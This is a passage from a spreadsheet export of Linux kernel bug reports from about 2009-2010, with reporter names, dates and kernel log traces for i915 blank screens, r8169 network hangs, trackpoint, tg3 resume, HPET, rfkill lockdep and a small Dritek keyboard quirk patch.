1.812759] UDP-Lite hash table entries: 4096 (order: 7, 655360 bytes) [ 1.813475] NET: Registered protocol family 1 [ 1.813730] pci 0000:02:00.0: Boot video device [ 1.813761] PCI: CLS 64 bytes, default 64 [ 1.813915] Trying to unpack rootfs image as initramfs... [ 2.652760] Freeing initrd memory: 48917k freed [ 2.665314] DMA-API: preallocated 32768 debug entries [ 2.665317] DMA-API: debugging enabled by kernel config [ 2.665319] PCI-DMA: Using software bounce buffering for IO (SWIOTLB) [ 2.665322] Placing 64MB software IO TLB between ffff880020000000 - ffff880024000000</t>
  </si>
  <si>
    <t>Blank screen with KMS enabled</t>
  </si>
  <si>
    <t>2009-12-30 00:08 UTC</t>
  </si>
  <si>
    <t>Philipp Kohlbecher</t>
  </si>
  <si>
    <t>2010-01-24 21:46 UTC</t>
  </si>
  <si>
    <t>When the i915 module is loaded with modeset=1, the screen is blanked and stays that way, with the following in dmesg: [drm] DAC-6: set mode 640x480 0 [drm] TV-14: set mode NTSC 480i 0 ------------[ cut here ]------------ WARNING: at drivers/gpu/drm/drm_crtc_helper.c:1032 drm_helper_initial_config+0x36/0x52 [drm_kms_helper]() Hardware name: SX20S No connectors reported connected with modes Modules linked in: snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_intel8x0(+) firewire_ohci snd_intel8x0m(+) pcmcia snd_pcm_oss snd_ac97_codec firewire_core ac97_bus snd_mixer_oss i915(+) joydev crc_itu_t yenta_socket snd_pcm drm_kms_helper snd_timer drm rsrc_nonstatic b44 ipw2200 sdhci_pci ohci1394 snd cfbcopyarea soundcore psmouse video ssb sdhci pcmcia_core i2c_i801 libipw ieee1394 iTCO_wdt serio_raw snd_page_alloc pcspkr lib80211 iTCO_vendor_support output cfbimgblt cfbfillrect led_class mii aes_i586 aes_generic xts gf128mul Pid: 1226, comm: modprobe Not tainted 2.6.32 #1 Call Trace: [&lt;c0126274&gt;] warn_slowpath_common+0x65/0x7c [&lt;f9b5dd62&gt;] ? drm_helper_initial_config+0x36/0x52 [drm_kms_helper] [&lt;c01262bf&gt;] warn_slowpath_fmt+0x24/0x27 [&lt;f9b5dd62&gt;] drm_helper_initial_config+0x36/0x52 [drm_kms_helper] [&lt;fa31c6e6&gt;] i915_driver_load+0xddb/0xe80 [i915] [&lt;f96a8b55&gt;] drm_get_dev+0x2ad/0x38a [drm] [&lt;fa33cd90&gt;] i915_pci_probe+0xd/0x9f [i915] [&lt;c026ded7&gt;] local_pci_probe+0xe/0x10 [&lt;c026e823&gt;] pci_device_probe+0x43/0x66 [&lt;c02d197f&gt;] driver_probe_device+0x8a/0x109 [&lt;c02d1a41&gt;] __driver_attach+0x43/0x5f [&lt;c02d11c3&gt;] bus_for_each_dev+0x3d/0x67 [&lt;c02d1847&gt;] driver_attach+0x14/0x16 [&lt;c02d19fe&gt;] ? __driver_attach+0x0/0x5f [&lt;c02d1568&gt;] bus_add_driver+0x8f/0x1bf [&lt;c025edc9&gt;] ? kset_find_obj+0x1b/0x43 [&lt;c02d1c7f&gt;] driver_register+0x79/0xe0 [&lt;c026e9bb&gt;] __pci_register_driver+0x31/0x8e [&lt;f96a5259&gt;] drm_init+0x5d/0xb5 [drm] [&lt;fa354000&gt;] ? i915_init+0x0/0x4d [i915] [&lt;fa35404b&gt;] i915_init+0x4b/0x4d [i915] [&lt;c0101133&gt;] do_one_initcall+0x4b/0x130 [&lt;c0149f79&gt;] sys_init_module+0xa7/0x1de [&lt;c010296b&gt;] sysenter_do_call+0x12/0x22 ---[ end trace 2d06d367c79ff13a ]--- [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 Things worked fine under 2.6.31. (I can bisect if necessary.) Disabling KMS by passing modeset=0 as a module parameter works around this issue. I am using a Samsung X20 laptop with an Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 03).</t>
  </si>
  <si>
    <t>r8169 hangs when your transmission speed is really high.</t>
  </si>
  <si>
    <t>2.6.29-2.6.32</t>
  </si>
  <si>
    <t>2009-12-30 13:44 UTC</t>
  </si>
  <si>
    <t>Victor Pablos Ceruelo</t>
  </si>
  <si>
    <t>2015-06-06 20:10 UTC</t>
  </si>
  <si>
    <t>Ben Hutchings suggested me to make a separate report. Here it is. More info (kernel logs, kernel oops and so on) can be found at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=528362 r8169 hangs usually under heavily loads, although it hangs too while only reading email. The error message always says transmit timed out and refers to dev_watchdog [ 1388.000145] ------------[ cut here ]------------ [ 1388.000154] WARNING: at /build/buildd-linux-2.6_2.6.29-4-i386-vcILAN/linux-2.6-2.6.29/debian/build/source_i386_none/net/sched/sch_generic.c:226 dev_watchdog+0xa8/0x13b() [ 1388.000163] Hardware name: Satellite A110 [ 1388.000167] NETDEV WATCHDOG: eth0 (r8169): transmit timed out [ 1388.000172] Modules linked in: i915 drm i2c_algo_bit binfmt_misc ppdev parport_pc lp parport ipv6 acpi_cpufreq cpufreq_powersave cpufreq_userspace cpufreq_conservative cpufreq_stats nls_utf8 nls_cp437 vfat fat nls_base fuse firewire_sbp2 loop snd_hda_codec_realtek snd_hda_intel snd_hda_codec arc4 snd_hwdep ecb snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy iwl3945 snd_seq_oss pcmcia snd_seq_midi snd_rawmidi snd_seq_midi_event rfkill snd_seq mac80211 snd_timer joydev snd_seq_device yenta_socket lib80211 snd rsrc_nonstatic i2c_i801 psmouse soundcore pcmcia_core rng_core i2c_core pcspkr cfg80211 evdev serio_raw snd_page_alloc container battery video button ac output ext3 jbd mbcache sg sr_mod cdrom sd_mod crc_t10dif ide_pci_generic ide_core ata_generic ata_piix sdhci_pci sdhci uhci_hcd libata mmc_core led_class firewire_ohci firewire_core crc_itu_t scsi_mod ehci_hcd r8169 usbcore mii intel_agp agpgart thermal processor fan thermal_sys dm_mirror dm_region_hash dm_log dm_mod [ 1388.000373] Pid: 0, comm: swapper Not tainted 2.6.29-2-686 #1 [ 1388.000378] Call Trace: [ 1388.000389] [&lt;c0125e98&gt;] warn_slowpath+0x80/0xb6 [ 1388.000398] [&lt;c011fb5e&gt;] update_rq_clock+0xe/0x1c [ 1388.000407] [&lt;c0120e8c&gt;] try_to_wake_up+0x14e/0x157 [ 1388.000415] [&lt;c011a44c&gt;] place_entity+0x6c/0x9b [ 1388.000423] [&lt;c011ca00&gt;] put_prev_task_fair+0x77/0xd2 [ 1388.000431] [&lt;c011cf40&gt;] enqueue_task_fair+0x19/0x51 [ 1388.000438] [&lt;c011a849&gt;] enqueue_task+0x52/0x5d [ 1388.000445] [&lt;c011a94d&gt;] activate_task+0x1c/0x21 [ 1388.000453] [&lt;c0120e8c&gt;] try_to_wake_up+0x14e/0x157 [ 1388.000462] [&lt;c028e731&gt;] dev_watchdog+0xa8/0x13b [ 1388.000471] [&lt;c01162e2&gt;] default_spin_lock_flags+0x5/0x7 [ 1388.000480] [&lt;c02e7359&gt;] _spin_lock_irqsave+0x25/0x2b [ 1388.000488] [&lt;c012da35&gt;] lock_timer_base+0x19/0x35 [ 1388.000495] [&lt;c012dbcb&gt;] __mod_timer+0x96/0x9f [ 1388.000504] [&lt;c012d574&gt;] run_timer_softirq+0x14a/0x1b4 [ 1388.000512] [&lt;c028e689&gt;] dev_watchdog+0x0/0x13b [ 1388.000521] [&lt;c012a368&gt;] __do_softirq+0x8c/0x115 [ 1388.000528] [&lt;c012a436&gt;] do_softirq+0x45/0x53 [ 1388.000536] [&lt;c012a55a&gt;] irq_exit+0x35/0x62 [ 1388.000544] [&lt;c01051a5&gt;] do_IRQ+0x64/0x77 [ 1388.000552] [&lt;c0103a87&gt;] common_interrupt+0x27/0x2c [ 1388.000589] [&lt;f80b7081&gt;] acpi_idle_enter_bm+0x279/0x2c9 [processor] [ 1388.000601] [&lt;c026ebf1&gt;] cpuidle_idle_call+0x5d/0x90 [ 1388.000609] [&lt;c010260a&gt;] cpu_idle+0x5e/0x78 [ 1388.000614] ---[ end trace 8c9b2278a50f5bb7 ]--- Most of time network device works again by using sudo rmmod r8169 mii ; sudo modprobe r8169 ; sudo modprobe mii I've tested kernel options noacpi pci=nomsi and the only difference is that it takes more or less time to appear the problem. Thanks in advance. Regards, Victor</t>
  </si>
  <si>
    <t>IBM Trackpoint Device changed - Scrolling doesn't work</t>
  </si>
  <si>
    <t>2010-01-01 21:53 UTC</t>
  </si>
  <si>
    <t>Victor Hooi</t>
  </si>
  <si>
    <t>2010-01-24 22:11 UTC</t>
  </si>
  <si>
    <t>heya, I have an IBM/Lenovo X200 Tablet PC, with a trackpoint pointing device. Previously, on 2.6.31, I was able to enable trackpoint scrolling, as per the instructions here: http://www.thinkwiki.org/wiki/How_to_configure_the_TrackPoint#Configuration_using_udev_and_HAL However, upon upgrading to 2.6.32, this no longer works. It appears that the device name has been changed from "TPPS/2 IBM TrackPoint", to "PS/2 Generic Mouse". However, even with this fix, the trackpoint scrolling stops working after a suspend/resume cycle, and will not work again till the machine is rebooted. Also, other users report that setting the sensitivity/speed of the trackpoint is now broken, as the files /sys/devices/platform/i8042/serio1/sensitivity and /sys/devices/platform/i8042/serio1/speed don't exist anymore. There's a discussion of the issue on the Arch Forum Boards here: http://bbs.archlinux.org/viewtopic.php?pid=680645 as well as a Ubuntu bug report here, with dmesg and other diagnostics: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/492729 and an Arch Linux bug report here: http://bugs.archlinux.org/task/17435 Cheers, Victor</t>
  </si>
  <si>
    <t>tg3 does not resume from hibernation properly on BCM5787M</t>
  </si>
  <si>
    <t>2010-01-02 05:30 UTC</t>
  </si>
  <si>
    <t>Chow Loong Jin</t>
  </si>
  <si>
    <t>2010-01-15 21:52 UTC</t>
  </si>
  <si>
    <t>After a resume from hibernation, no incoming packets seem to be registered by eth0 on a BCM5787M card on Lenovo 3000 Y410. The RX packet count appears to increase, but tcpdump shows nothing incoming. ARP requests also fail. tcpdump on a remote machine show the ARP requests being replied, but the replies are not registered by the local machine. Broadcast packets also get transmitted successfully, but nothing gets received. Restarting the machine into the same kernel does not resolve this issue, i.e. eth0 remains blind to all incoming packets. A restart into an older kernel does seem to work though. A bisect shows that 87668d352aa8d135bd695a050f18bbfc7b50b506 is the commit which caused the regression. Reverting this on top of my local git tree solves the issue.</t>
  </si>
  <si>
    <t>HPET WARNING at kernel boot</t>
  </si>
  <si>
    <t>2.6.33-rc3</t>
  </si>
  <si>
    <t>2010-01-06 14:51 UTC</t>
  </si>
  <si>
    <t>------------[ cut here ]------------ WARNING: at arch/x86/kernel/hpet.c:402 hpet_next_event+0x7d/0x90() Hardware name: Studio 1557 hpet: compare register read back failed. Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.33-rc3 #5 Call Trace: [&lt;ff</t>
  </si>
  <si>
    <t>possible circular locking dependency detected in rfkill at suspend</t>
  </si>
  <si>
    <t>2010-01-06 21:52 UTC</t>
  </si>
  <si>
    <t>2010-03-12 20:17 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.33-rc3 64bits Acer Aspire 1511LMi Bluewhite 64 13 (64bits port of Slackware 13) While suspending to ram, I got the following warning: ... PM: Entering mem sleep Suspending console(s) (use no_console_suspend to debug) ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.33-rc3 #2 ------------------------------------------------------- hibernate.sh/3424 is trying to acquire lock: ((&amp;(&amp;rfkill-&gt;poll_work)-&gt;work)){+.+...}, at: [&lt;ffffffff81049944&gt;] __cancel_work_timer+0x74 /0x210 but task is already holding lock: (s_active){++++.+}, at: [&lt;ffffffff8110ae82&gt;] sysfs_get_active_two+0x22/0x60 which lock already depends on the new lock. I didn't experienced this warning with previous versions. the existing dependency chain (in reverse order) is: -&gt; #2 (s_active){++++.+}: [&lt;ffffffff81060f9c&gt;] __lock_acquire+0x165c/0x1d10 [&lt;ffffffff810616ab&gt;] lock_acquire+0x5b/0x80 [&lt;ffffffff8110ab41&gt;] sysfs_addrm_finish+0xf1/0x180 [&lt;ffffffff81108bf6&gt;] sysfs_hash_and_remove+0x56/0x80 [&lt;ffffffff8110be4f&gt;] sysfs_remove_group+0x4f/0xe0 [&lt;ffffffff812d53f4&gt;] dpm_sysfs_remove+0x14/0x20 [&lt;ffffffff812ceb25&gt;] device_del+0x45/0x1a0 [&lt;ffffffff812cec91&gt;] device_unregister+0x11/0x20 [&lt;ffffffff812d9539&gt;] _request_firmware+0x2f9/0x4e0 [&lt;ffffffff812d97ae&gt;] request_firmware+0xe/0x10 [&lt;ffffffff8132f618&gt;] b43_do_request_fw+0x98/0x230 [&lt;ffffffff81330ba7&gt;] b43_try_request_fw+0x97/0x360 [&lt;ffffffff81332b7a&gt;] b43_wireless_core_init+0x1ca/0x10e0 [&lt;ffffffff81333c40&gt;] b43_op_start+0x1b0/0x1d0 [&lt;ffffffff81565809&gt;] ieee80211_open+0x3d9/0x6d0 [&lt;ffffffff814558aa&gt;] dev_open+0xca/0x110 [&lt;ffffffff81454aed&gt;] dev_change_flags+0x9d/0x1e0 [&lt;ffffffff814b3879&gt;] devinet_ioctl+0x8e9/0x8f0 [&lt;ffffffff814b4c14&gt;] inet_ioctl+0x94/0xc0 [&lt;ffffffff8144010d&gt;] sock_do_ioctl+0x2d/0x60 [&lt;ffffffff814401b6&gt;] sock_ioctl+0x76/0x280 [&lt;ffffffff810bff15&gt;] vfs_ioctl+0x35/0xd0 [&lt;ffffffff810c00ea&gt;] do_vfs_ioctl+0x8a/0x5c0 [&lt;ffffffff810c066a&gt;] sys_ioctl+0x4a/0x80 [&lt;ffffffff81002468&gt;] system_call_fastpath+0x16/0x1b -&gt; #1 (&amp;wl-&gt;mutex){+.+.+.}: [&lt;ffffffff81060f9c&gt;] __lock_acquire+0x165c/0x1d10 [&lt;ffffffff810616ab&gt;] lock_acquire+0x5b/0x80 [&lt;ffffffff8158851b&gt;] mutex_lock_nested+0x5b/0x380 [&lt;ffffffff8134a244&gt;] b43_rfkill_poll+0x44/0x130 [&lt;ffffffff815675c2&gt;] ieee80211_rfkill_poll+0x22/0x40 [&lt;ffffffff8153e204&gt;] cfg80211_rfkill_poll+0x14/0x20 [&lt;ffffffff81574333&gt;] rfkill_poll+0x23/0x40 [&lt;ffffffff81048fd5&gt;] worker_thread+0x1e5/0x340 [&lt;ffffffff8104d21e&gt;] kthread+0x9e/0xb0 [&lt;ffffffff81003074&gt;] kernel_thread_helper+0x4/0x10 -&gt; #0 ((&amp;(&amp;rfkill-&gt;poll_work)-&gt;work)){+.+...}: [&lt;ffffffff810615ac&gt;] __lock_acquire+0x1c6c/0x1d10 [&lt;ffffffff810616ab&gt;] lock_acquire+0x5b/0x80 [&lt;ffffffff81049976&gt;] __cancel_work_timer+0xa6/0x210 [&lt;ffffffff81049aed&gt;] cancel_delayed_work_sync+0xd/0x10 [&lt;ffffffff8157422f&gt;] rfkill_pause_polling+0x1f/0x30 [&lt;ffffffff8157424d&gt;] rfkill_suspend+0xd/0x20 [&lt;ffffffff812d5b43&gt;] legacy_suspend+0x33/0x80 [&lt;ffffffff812d6070&gt;] dpm_suspend_start+0x460/0x4f0 [&lt;ffffffff8106da5f&gt;] suspend_devices_and_enter+0x5f/0x200 [&lt;ffffffff8106dd29&gt;] enter_state+0x129/0x150 [&lt;ffffffff8106d33a&gt;] state_store+0xba/0x100 [&lt;ffffffff8123f057&gt;] kobj_attr_store+0x17/0x20 [&lt;ffffffff811094c4&gt;] sysfs_write_file+0xd4/0x150 [&lt;ffffffff810b15e6&gt;] vfs_write+0xc6/0x150 [&lt;ffffffff810b1760&gt;] sys_write+0x50/0x90 [&lt;ffffffff81002468&gt;] system_call_fastpath+0x16/0x1b other info that might help us debug this: 4 locks held by hibernate.sh/3424: #0: (&amp;buffer-&gt;mutex){+.+.+.}, at: [&lt;ffffffff81109434&gt;] sysfs_write_file+0x44/0x150 #1: (s_active){++++.+}, at: [&lt;ffffffff8110ae9d&gt;] sysfs_get_active_two+0x3d/0x60 #2: (s_active){++++.+}, at: [&lt;ffffffff8110ae82&gt;] sysfs_get_active_two+0x22/0x60 #3: (pm_mutex){+.+.+.}, at: [&lt;ffffffff8106dc49&gt;] enter_state+0x49/0x150 stack backtrace: Pid: 3424, comm: hibernate.sh Not tainted 2.6.33-rc3 #2 Call Trace: [&lt;ffffffff8105f2d0&gt;] print_circular_bug+0xf0/0x100 [&lt;ffffffff81049944&gt;] ? __cancel_work_timer+0x74/0x210 [&lt;ffffffff810615ac&gt;] __lock_acquire+0x1c6c/0x1d10 [&lt;ffffffff8105e7bf&gt;] ? mark_held_locks+0x6f/0x90 [&lt;ffffffff810616ab&gt;] lock_acquire+0x5b/0x80 [&lt;ffffffff81049944&gt;] ? __cancel_work_timer+0x74/0x210 [&lt;ffffffff81049976&gt;] __cancel_work_timer+0xa6/0x210 [&lt;ffffffff81049944&gt;] ? __cancel_work_timer+0x74/0x210 [&lt;ffffffff8105e7bf&gt;] ? mark_held_locks+0x6f/0x90 [&lt;ffffffff815887b5&gt;] ? mutex_lock_nested+0x2f5/0x380 [&lt;ffffffff81574240&gt;] ? rfkill_suspend+0x0/0x20 [&lt;ffffffff81049aed&gt;] cancel_delayed_work_sync+0xd/0x10 [&lt;ffffffff8157422f&gt;] rfkill_pause_polling+0x1f/0x30 [&lt;ffffffff8157424d&gt;] rfkill_suspend+0xd/0x20 [&lt;ffffffff812d5b43&gt;] legacy_suspend+0x33/0x80 [&lt;ffffffff812d6070&gt;] dpm_suspend_start+0x460/0x4f0 [&lt;ffffffff8106da5f&gt;] suspend_devices_and_enter+0x5f/0x200 [&lt;ffffffff8106dd29&gt;] enter_state+0x129/0x150 [&lt;ffffffff8106d33a&gt;] state_store+0xba/0x100 [&lt;ffffffff8123f057&gt;] kobj_attr_store+0x17/0x20 [&lt;ffffffff811094c4&gt;] sysfs_write_file+0xd4/0x150 [&lt;ffffffff810b15e6&gt;] vfs_write+0xc6/0x150 [&lt;ffffffff810b1760&gt;] sys_write+0x50/0x90 [&lt;ffffffff81002468&gt;] system_call_fastpath+0x16/0x1b parport_pc 00:0b: disabled b43-pci-bridge 0000:02:08.0: PCI INT A disabled ... PM: suspend of devices complete after 567.248 msecs PM: late suspend of devices complete after 39.686 msecs ACPI: Preparing to enter system sleep state S3 Back to C! ACPI: Waking up from system sleep state S3 ... The hibernation script called stops the network with: /etc/rc.d/rc.inet1 stop before going to sleep.</t>
  </si>
  <si>
    <t>Dritek quirk for Acer Aspire 5610</t>
  </si>
  <si>
    <t>2.6.31.9-174.fc12.i686</t>
  </si>
  <si>
    <t>2010-01-09 07:04 UTC</t>
  </si>
  <si>
    <t>Elliott Sales de Andrade</t>
  </si>
  <si>
    <t>2010-02-23 23:02 UTC</t>
  </si>
  <si>
    <t>I have an Acer Aspire 5610 with some extra buttons that no longer work (with the deprecation of acerhk). Using the module parameter i8042.dritek=1, I was then able to use the buttons. A simple patch to add this model follows. It's basically a copy-paste of the 5630 entry. --- drivers/input/serio/i8042-x86ia64io.h.old 2010-01-09 01:59:38.000000000 -0500 +++ drivers/input/serio/i8042-x86ia64io.h 2010-01-09 02:00:28.000000000 -0500 @@ -467,6 +467,13 @@ */ static struct dmi_system_id __initdata i8042_dmi_dritek_table[] = { { + .ident = "Acer Aspire 5610", + .matches = { + DMI_MATCH(DMI_SYS_VENDOR, "Acer"), + DMI_MATCH(DMI_PRODUCT_NAME, "Aspire 5610"), + }, + }, + { .ident = "Acer Aspire 5630", .matches = { DMI_MATCH(DMI_SYS_VENDOR, "Acer"),</t>
  </si>
  <si>
    <t>Poor performance on O2 Micro carbus bridge (OZ6933)</t>
  </si>
  <si>
    <t>2010-01-09 14:09 UTC</t>
  </si>
  <si>
    <t>2016-01-20 23:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 24493 [details] lspci -vv Since kernel 2.6.32 i noticed degraded performance on network file transfers from my 8139too pcmcia card (3MB/sec instead of 11MB/sec). I bisected till this: 1ff84890b62b20823b3697a6041bbec1b5280cee is the first bad commit commit 1ff84890b62b20823b3697a6041bbec1b5280cee Author: Tomas Kovacik &lt;nail@nodomain.sk&gt; Date: Sun Jul 26 22:04:58 2009 +0200 pcmcia: disable prefetch/burst for OZ6933 Problems have been reported [1], so disable prefetch/burst, to be on the safe side. [1] http://www.mail-archive.com/linux-pcmcia@lists.infradead.org/msg02048.html Signed-off-by: TomÃ¡Å¡ KovÃ¡Äik &lt;nail@nodomain.sk&gt; Signed-off-by: Wolfram Sang &lt;w.sang@pengutronix.de&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; :040000 040000 bc4841745f3cba3e1cf1c952d4ce987572fa40f8 8b5f282e917ce1b11b499f81ad219a71487faccd M drivers I agree with the "be on the safe side" statement, but... Bye</t>
  </si>
  <si>
    <t>blank screen at random times in laptop when sitting idle</t>
  </si>
  <si>
    <t>2.6.32-4</t>
  </si>
  <si>
    <t>2010-01-09 16:48 UTC</t>
  </si>
  <si>
    <t>2012-05-09 20:49 UTC</t>
  </si>
  <si>
    <t>Hi there, With the 2.6.32 kernel the laptop screen just goes blank. I initially thought it was when laptop lid is closed and opened. But I was hit with this even with out that by just staying idle. Even with lid close there is no reliable way with which I am able to reproduce this. It appears to occur randomly. But they leave a stack trace in the logs Jan 9 20:36:06 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:36:06 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:36:06 grainlead-lx kernel: Jan 9 20:36:06 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:36:06 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:36:06 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:36:06 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:36:06 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:36:06 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:36:06 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:36:06 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:36:06 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:36:06 grainlead-lx kernel: Call Trace: Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:36:06 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 20:36:06 grainlead-lx kernel: [&lt;c105e1f7&gt;] ? enqueue_hrtimer+0x67/0xd0 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c10f1649&gt;] ? vfs_ioctl+0x89/0xa0 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c10f17c9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c105f1a0&gt;] ? hrtimer_start+0x20/0x30 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c1044772&gt;] ? do_setitimer+0x162/0x1f0 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c1064a80&gt;] ? ktime_get_ts+0xd0/0x100 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c10f1d86&gt;] ? sys_ioctl+0x76/0x90 Jan 9 20:36:06 grainlead-lx kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Jan 9 20:37:11 grainlead-lx kernel: BUG: soft lockup - CPU#0 stuck for 61s! [X:5209] Jan 9 20:37:11 grainlead-lx kernel: Modules linked in: nls_cp437 vfat fat aes_i586 aes_generic ipv6 ext2 ide_cs ide_core arc4 snd_seq_dummy snd_hda_codec_analog snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ecb joydev ppdev parport_pc fan snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon sdhci_pci sdhci iwl3945 irtty_sir snd_pcm snd_timer hp_accel mmc_core firewire_ohci firewire_core crc_itu_t tpm tpm_bios yenta_socket rsrc_nonstatic container snd soundcore psmouse lis3lv02d input_polldev sir_dev ricoh_mmc iTCO_wdt iTCO_vendor_support lp iwlagn iwlcore snd_page_alloc wmi usb_storage battery irda crc_ccitt parport ac sg thermal serio_raw btusb bluetooth mac80211 led_class evdev e1000e cfg80211 rfkill cpufreq_powersave cpufreq_ondemand acpi_cpufreq freq_table processor rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod cdrom sd_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart uhci_hcd ehci_hcd usbcore ata_piix ahci pata_pcmcia libata scsi_mod pcmcia pcmcia_core Jan 9 20:37:11 grainlead-lx kernel: Jan 9 20:37:11 grainlead-lx kernel: Pid: 5209, comm: X Not tainted (2.6.32-ARCH #1) HP Compaq 6910p (GX978UC#ACJ) Jan 9 20:37:11 grainlead-lx kernel: EIP: 0060:[&lt;f8252121&gt;] EFLAGS: 00203286 CPU: 0 Jan 9 20:37:11 grainlead-lx kernel: EIP is at i8xx_disable_fbc+0x231/0x270 [i915] Jan 9 20:37:11 grainlead-lx kernel: EAX: f68b1800 EBX: f8680000 ECX: f68ac000 EDX: a0000142 Jan 9 20:37:11 grainlead-lx kernel: ESI: 00071008 EDI: f68ac000 EBP: 00071180 ESP: f0429d84 Jan 9 20:37:11 grainlead-lx kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Jan 9 20:37:11 grainlead-lx kernel: CR0: 8005003b CR2: b7793000 CR3: 365aa000 CR4: 000006d0 Jan 9 20:37:11 grainlead-lx kernel: DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 Jan 9 20:37:11 grainlead-lx kernel: DR6: ffff0ff0 DR7: 00000400 Jan 9 20:37:11 grainlead-lx kernel: Call Trace: Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8252914&gt;] ? i9xx_crtc_dpms+0x3a4/0x410 [i915] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f82529ab&gt;] ? intel_crtc_dpms+0x2b/0x100 [i915] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8258567&gt;] ? intel_lvds_set_power+0xd7/0xf0 [i915] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8131fd4&gt;] ? drm_helper_connector_dpms+0x144/0x260 [drm_kms_helper] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8258580&gt;] ? intel_lvds_dpms+0x0/0x20 [i915] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8180d19&gt;] ? drm_mode_object_find+0x49/0x70 [drm] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f81810cb&gt;] ? drm_mode_connector_property_set_ioctl+0x1eb/0x1f0 [drm] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f818128f&gt;] ? drm_mode_getproperty_ioctl+0x13f/0x2e0 [drm] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f81762b8&gt;] ? drm_ioctl+0x158/0x320 [drm] Jan 9 20:37:11 grainlead-lx kernel: [&lt;f8180ee0&gt;] ? drm_mode_connector_property_set_ioctl+0x0/0x1f0 [drm] Jan 9 